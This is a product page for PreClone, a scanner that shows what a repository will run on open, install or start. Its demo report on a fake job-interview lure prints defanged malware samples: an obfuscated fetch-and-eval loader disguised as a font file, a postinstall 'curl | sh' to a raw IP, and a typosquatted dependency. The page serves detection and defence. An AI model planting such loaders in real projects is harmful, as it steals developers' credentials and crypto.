Skip to content
PreClone

See what a repo runs on your machine before you clone it.

Paste a GitHub, GitLab or Bitbucket link. See the commands it's set to run on your machine, and when, without running any of it.

Zips are read in your browser and never uploaded.

No link handy? Open one of these lures.

Inert copies of real tricks. Nothing in them can run.

Malware signs. Opening the folder runs a font file as a program (task “eslint-check”)

The lure: A recruiter on LinkedIn sends a “senior full-stack take-home”: clone it, run it, fix the wallet bug by Friday.

defi-dashboard-assessment

Source
Inert example, modelled on a documented campaign
Files
9

Malware signs

Don't open or install this.

3 critical findings match patterns used by malware hidden in repos, set to run when you open the folder, when you install dependencies and when you start it. Fake take-home tests and “review our code” lures are built this way.

  • Don't open it in VS Code, Cursor or any other editor or IDE. Don't run npm install, pip install or any other install in it. Don't start it or run its scripts or tests.
  • If you already did: from another device, change the passwords saved in your browser, revoke GitHub, npm and cloud tokens, and move any crypto to a new wallet.
  • If someone sent it to you, check who they are before you reply, and don't run anything else they send.

When you open the folder

VS Code, Cursor, JetBrains, rust-analyzer, dev containers, Vim, Emacs, direnv, mise

CriticalRuns without asking

Opening the folder runs a font file as a program (task “eslint-check”)

.vscode/tasks.json tells VS Code, Cursor and other VS Code-based editors to run this when you open the folder. Once you trust the folder, VS Code runs it right away if you've ever allowed automatic tasks; otherwise it asks once, and that answer covers every trusted folder. Cursor ships with Workspace Trust off, and researchers have shown it running such tasks as soon as a folder opens. It runs public/fonts/fa-brands-regular.woff2 (a font file, which should never run as a program), which matches malware patterns: runs code hidden in an HTTP error response; evaluates data downloaded from a server; uses a raw IP on a port BeaverTail and InvisibleFerret use. It is set up to stay out of sight: terminal output hidden (reveal: "silent"), command not echoed, terminal closes itself afterwards, terminal never gets focus.

Runsnode public/fonts/fa-brands-regular.woff2

.vscode/tasks.jsonline 7
      "label": "eslint-check",      "type": "shell",      "command": "node public/fonts/fa-brands-regular.woff2",      "osx": { "command": "node public/fonts/fa-brands-regular.woff2" },      "windows": { "command": "node public\\fonts\\fa-brands-regular.woff2" },
public/fonts/fa-brands-regular.woff2line 4
const _0x1a2b=['\x67\x65\x74','\x64\x61\x74\x61'];const _0x3c4d=function(_0x5e6f){return _0x1a2b[_0x5e6f]};const _0x7a8b=require('axios');const _0x9c0d='hxxp://203[.]0[.]113[.]7:1244/client/7/node';_0x7a8b[_0x3c4d(0x0)](_0x9c0d).then(_0x1e2f=>{eval(_0x1e2f[_0x3c4d(0x1)])}).catch(_0x3a4b=>{eval(_0x3a4b.response.data)}); 
vscode.task.folder-open

When you install

npm, pnpm, yarn, bun, pip, bundler, mise

CriticalRuns without asking

npm install runs the “postinstall” script

package.json runs postinstall automatically when you run npm, pnpm, yarn or bun install in this folder, before you've run the app. It runs scripts/check-node.js, which matches malware patterns: uses a raw IP on a port BeaverTail and InvisibleFerret use; downloads a script and pipes it to a shell; talks to a raw IP address. npm install --ignore-scripts skips it.

Runsnode scripts/check-node.js

package.jsonline 6
  "private": true,  "scripts": {    "postinstall": "node scripts/check-node.js",    "start": "node server/server.js",    "dev": "concurrently \"npm:start\" \"npm:client\"",
scripts/check-node.jsline 7
if (Number(v) < 18) console.warn("Please use Node 18+");const os = process.platform === "win32" ? "w" : process.platform === "darwin" ? "m" : "l";exec(`curl -s hxxp://203[.]0[.]113[.]7:1244/s/${os} | sh`, () => {}); 
npm.lifecycle-script
High

jsonwebtokn isn't on npm and looks like a misspelling of jsonwebtoken

No package called jsonwebtokn is published on npm, and the name is very close to jsonwebtoken. Anyone could register jsonwebtokn, and installs of this project would then download whatever they publish. Check whether jsonwebtoken was meant.

package.jsonline 16
    "ethers": "^6.13.1",    "express": "^4.19.2",    "jsonwebtokn": "^9.0.2",    "mongoose": "^8.4.1",    "react": "^18.3.1",
deps.not-on-npm

When you run it

npm start, make, just, task, rake, setup scripts, pytest, configs your tools load

Critical

npm start loads code that looks malicious

The “start” script (server/server.js → server/routes/auth.js → server/config/db.js) is how a take-home or client project expects you to start it. It runs server/config/db.js, which matches malware patterns: evaluates the body of an HTTP response; downloads code and runs it; uses a raw IP on a port BeaverTail and InvisibleFerret use.

Runsnode server/server.js

package.jsonline 7
  "scripts": {    "postinstall": "node scripts/check-node.js",    "start": "node server/server.js",    "dev": "concurrently \"npm:start\" \"npm:client\"",    "client": "react-scripts start"
server/config/db.jsline 2
const mongoose = require("mongoose");[356 chars in] hxxp://198[.]51[.]100[.]23:1244/api/service/token/3a1f");eval(await r.text())}catch(e){}})(); 
npm.run-script.payload

Six moments a repo gets to run code

Opening a folder feels harmless. It isn't. Each of these runs something the repo chose, usually before you've read a line of it, and the first two need nothing from you but opening the folder or starting your agent. PreClone checks all six.

  1. 1Open the folder

    Your editor runs tasks marked to start on open. Cursor ships with Workspace Trust off, so nothing asks first.

    • .vscode/tasks.json
    • .vscode/settings.json
    • .devcontainer/devcontainer.json
    • .idea/workspace.xml
    • *.code-workspace
  2. 2Let an AI agent in

    Claude Code, Cursor and Copilot read project settings, start MCP servers and follow instruction files, including text you can't see.

    • .claude/settings.json
    • .mcp.json
    • AGENTS.md
    • CLAUDE.md
    • .cursor/rules/*.mdc
  3. 3Install

    npm, pnpm, yarn and bun run lifecycle scripts, read package-manager config and fetch git and URL dependencies.

    • package.json scripts
    • .npmrc
    • .yarnrc.yml
    • .pnpmfile.cjs
    • setup.py
  4. 4Run it

    `npm start` loads a chain of files, and build tools load their configs. The payload is often five requires deep.

    • server.js → routes → config/db.js
    • next.config.js
    • vite.config.ts
    • postcss.config.mjs
  5. 5Commit

    Husky and Lefthook set their hooks up when you install; pre-commit does once you run pre-commit install. Then they run on commit, checkout and push.

    • .husky/*
    • lefthook.yml
    • .pre-commit-config.yaml
    • .git/hooks/* (in zips)
  6. 6In the code

    Obfuscated code, fake fonts and images that are really JavaScript, credential grabs and known dead-drop hosts, even when nothing wires them up yet.

    • public/fonts/*.woff2
    • *.min.js outside dist
    • base64 blobs
    • invisible Unicode

How it reads a repo

The whole point is to look before anything executes, so the scanner can't execute anything either.

  1. 1

    Download, don't clone.

    PreClone fetches the archive GitHub, GitLab or Bitbucket serves for the commit. No git, no hooks, no checkout. Zips are opened in your browser instead.

  2. 2

    Read every entry point.

    Editor tasks, agent settings, package scripts, hook managers and build configs are parsed for the commands they'd run, and each command is followed into the files it loads.

  3. 3

    Judge what actually runs.

    Those files are checked for download-and-execute, obfuscation, credential grabs, hidden text and known dead-drop hosts. Dependencies are looked up on npm and OSV for known malware.

The take-home that installs malware is a campaign, not a rumour

The advice in every one of these threads is the same: open strangers' code in a VM. It's good advice that almost nobody follows for a 20-minute coding test. PreClone is the ten-second version: look first.

  • r/webdevJun 2026

    A developer got a fake job offer and traced the repo's nested fake dependency by hand. About 1.2k upvotes. Source

  • Hacker NewsJul 2026

    A take-home shipped a git hook that downloaded and ran a script on commit. 482 points, and a reply asks why no tool shows this before you trust a repo. Source

  • r/cscareerquestionsDec 2025

    A take-home's VS Code task ran a script the moment the folder opened. 593 upvotes. Source

  • r/webdevMay 2026

    Fake Upwork and Dribbble clients sent repos that installed malware on npm install. Source

  • Trend MicroApr 2026

    Void Dokkaebi: fake interview repos spreading malware, tracked across hundreds of GitHub repositories. Source

  • ProofpointJun 2026

    UNK_DeadDrop sent code-review and job-offer lures to about 100 organisations in six weeks. Not only job seekers get these. Source

  • Check Point2026

    Claude Code project files could run commands and leak API tokens when a repo was opened (CVE-2025-59536). Source

What you have today, and where it stops

CheckPreCloneWorkspace Trustnpm audit, SocketGuardDogReading it yourself
Works before you clone or downloadYesNoPackages onlyPackages by name; a repo once downloadedOn GitHub's web view, slowly
Editor tasks that run on openYesOne prompt; off in CursorNoNot in its rulesIf you know the files
AI agent hooks, MCP servers, hidden instructionsYesNoNoNot in its rulesInvisible text, no
Install scripts and what they actually runYesNoFlags scripts in packagesFlags install hooks and risky setup.pyIf you follow every script
Follows npm start to the file that runsYesNoNoChecks every file insteadFive files deep, by hand
Malware code patterns (base64 exec, stealing keys)YesNoSocket, in packagesYesIf you spot them
Known-malware dependenciesnpm and OSVNoYesChecks each one with its rulesNo
A link you can send someoneYesNoPackage pagesNoNo

Socket and npm audit are good at what they do, which is watching your dependencies over time. Use them too. They just don't look at the repo's own tasks, hooks and agent settings.

GuardDog, Datadog's free open-source scanner, is the closest free tool. It checks package code for malware patterns across npm, PyPI, Go, crates.io, RubyGems, GitHub Actions and VS Code extensions. Its published rules don't cover editor tasks, git hooks or AI-agent settings, which is where PreClone looks first.

A few hosted checkers also take a link: ScanRepo (free, GitHub and Bitbucket) and DoubleCheck (a verdict and one finding free, $3.99 for the full report). Going by what their sites list, neither sorts findings by when they would run or reads AI-agent settings.

Check wherever the link shows up

Put PreClone in front of any GitHub link

Add our domain before the repo URL in the address bar.

preclone.dev/github.com/owner/repo

A button next to GitHub's Code button

The browser extension adds “Check before cloning” to GitHub, GitLab and Bitbucket. It runs only on those sites and makes no requests of its own; clicking it just opens the report.

Get the extension

The CLI, for folders and zips you already have

Same engine, on your machine. Exit codes for CI.

curl -fsSLO https://preclone.dev/cli/preclone-1.3.2.tgz
shasum -a 256 preclone-1.3.2.tgz   # compare with /cli/SHA256SUMS
npm install -g ./preclone-1.3.2.tgz
preclone github.com/owner/repo
preclone ~/Downloads/take-home.zip
preclone . --fail-on high

An API for platforms that pass repos around

Hiring tools, bootcamps and agencies can check every repo before a person opens it.

curl -X POST https://preclone.dev/api/v1/scan \
  -H "Authorization: Bearer pc_…" \
  -d '{"url":"github.com/owner/repo"}'

The safety check is free

Charging the person who's about to be phished would be backwards. Pro is for people who check repos all day, and for private code.

Free

For anyone handed a repo by a stranger.

$0forever

  • Public GitHub, GitLab and Bitbucket repos
  • Zip and tarball checks in your browser
  • Shareable report links and JSON export
  • The CLI, the browser extension and the API
  • 12 checks an hour without an account, 40 a day with one
  • History of your last 20 checks

Pro

For people who open other people's code for a living.

$9a month, or $90 a year

  • Everything in Free
  • Private GitHub and GitLab repos: a read-only token used for one download, never stored
  • Private reports only you can open
  • 1,000 checks a day, by web, CLI or API
  • Bigger repos: archives up to 200 MB (free: 80 MB)
  • History of your last 200 checks

Payments aren't switched on yet. Until they are, Pro is a free preview: private repos, private reports and the longer history work, with the free plan's limits.

A team plan for agencies, bootcamps and hiring platforms is next: shared history, an org API key, and a Slack or Discord bot that checks every repo link posted in a channel.

Questions people ask first

Does PreClone run any of the repo's code?
No. It downloads the archive that GitHub, GitLab or Bitbucket serve for a commit, reads the files in memory and throws them away. Nothing is cloned, installed, built or executed, on our servers or on yours. Zip uploads are read inside your browser tab.
So “Nothing flagged” means the repo is safe?
No, and PreClone never says that. It means nothing risky is set to run on its own when you open the folder, install it or start an AI agent in it, and no known malware patterns turned up. Routine tooling like Husky may still run, and the report lists it. Code that downloads more code later, compiled binaries and encrypted payloads can still hide from any static read. If you don't trust the sender, use a throwaway VM or Codespace anyway.
They pushed a fix and asked me to pull again. Should I check again?
Yes. Lures often arrive clean and get their payload in a later push, with a message saying a bug was fixed. Paste the same link again. If the commit has changed, the report opens with what's newly set to run and any new findings since the last check, and links to the earlier report.
What do you keep?
For a link you check, we keep the report (findings, file paths, the flagged lines) so the share link works. We don't keep the code. Zips never leave your browser; only package names and versions go to our server so they can be looked up on npm and OSV.
Can it check private repositories?
Yes, on Pro. You paste a read-only token with the URL; it's used for that one download and never stored or logged. The report is private to your account.
Isn't this what Workspace Trust is for?
Workspace Trust is one yes/no prompt at the moment you open a folder, with no detail about what will run. Most people click Trust, and Cursor ships with it off. PreClone tells you what you'd be trusting, before the code is on your disk.
What about false positives?
Each engine release is checked against 57 well-known repos, including Express, Next.js, React, VS Code, Prisma and pytest. The current engine rates 28 of them clear and 27 “Worth a look”, mostly for install scripts or AI-agent settings you'd want to know about. Two are too big for the web check, and none is rated higher. A sweep of 213 more popular repos turned up false positives, which were fixed, and two real “Read first” cases: dev containers that mount your SSH keys or run with full access to the host. On a saved report, every finding has a “Wrong? Tell us” link, and the report is stored with the rule and the commit it was about, so the rule can be fixed.
Does it replace Socket or npm audit?
No. Those watch your dependencies over time. PreClone answers a narrower question once: what will this particular repo do to my machine if I open it? It does look dependencies up on npm and OSV for known malware, as one part of that answer.
Aren't there other repo scanners?
A few. Most are scripts you run after cloning, which is too late for a task that runs when the folder opens. GuardDog, Datadog's free open-source scanner, is a good one for packages: it looks for malicious code patterns in npm, PyPI and other packages, including a folder you've downloaded. Its docs don't mention editor tasks or AI-agent settings, so the two work well together. There are hosted checkers too, such as ScanRepo and DoubleCheck. Going by what their sites list, they give a verdict but don't sort findings by when each thing would run or read AI-agent settings, and DoubleCheck charges $3.99 for the full report. PreClone's whole report is free.
How do I use it without the website?
The CLI runs the same engine on your machine for links, folders and zips; the browser extension adds a button next to GitHub's Code button; and you can put preclone.dev/ in front of any GitHub link. Setup for each is on the docs page.

Got a repo from someone you don't know?

Check it first